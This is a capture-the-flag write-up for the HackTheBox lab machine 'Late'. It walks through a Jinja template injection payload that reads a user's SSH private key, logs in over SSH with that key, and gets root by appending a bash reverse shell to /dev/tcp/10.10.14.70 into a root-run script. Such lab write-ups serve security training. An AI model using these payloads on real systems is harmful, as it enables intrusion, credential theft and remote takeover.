# Enum web app

![1](img/1.png)

# Add Domain and subdomain

`/etc/hosts`
`10.129.227.134  late.htb images.late.htb`

# File upload

![2](img/2.png)

just admit png images

# Error page

![3](img/3.png)

```
Error occured while processing the image: cannot identify image file '/home/svc_acc/app/uploads/test.png4041'
```

# Server Side Template Injection

Write in notepad and take a screenshot the upload.

`{{7*7}}`

![4](img/4.png)

`{{ get_flashed_messages.__globals__.__builtins__.open("/home/svc_acc/.ssh/id_rsa").read() }}`

![5](img/5.png)

# SSH Connection

- `chmod 400 svc_id`
- `ssh -i svc_id svc_acc@10.129.227.134`

![6](img/6.png)

# Privilege Escalation

Run linpeas. See a interesting file.

![7](img/7.png)

`/usr/local/sbin/ssh-alert.sh`

We have all privilege in that file.

![8](img/8.png)

Content of File.

![9](img/9.png)

The file execute after get ssh connection. We can modify the file to add a new command.

- `echo 'bash -i >& /dev/tcp/10.10.14.70/1234 0>&1' >> /usr/local/sbin/ssh-alert.sh`
- `ssh svc_acc@localhost`

![10](img/10.png)



